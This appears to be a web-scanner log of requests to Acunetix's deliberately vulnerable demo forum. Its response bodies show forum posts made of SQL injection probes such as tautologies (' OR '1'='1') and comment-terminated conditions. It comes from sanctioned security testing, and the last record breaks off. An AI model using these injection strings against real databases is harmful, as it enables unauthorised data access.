<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
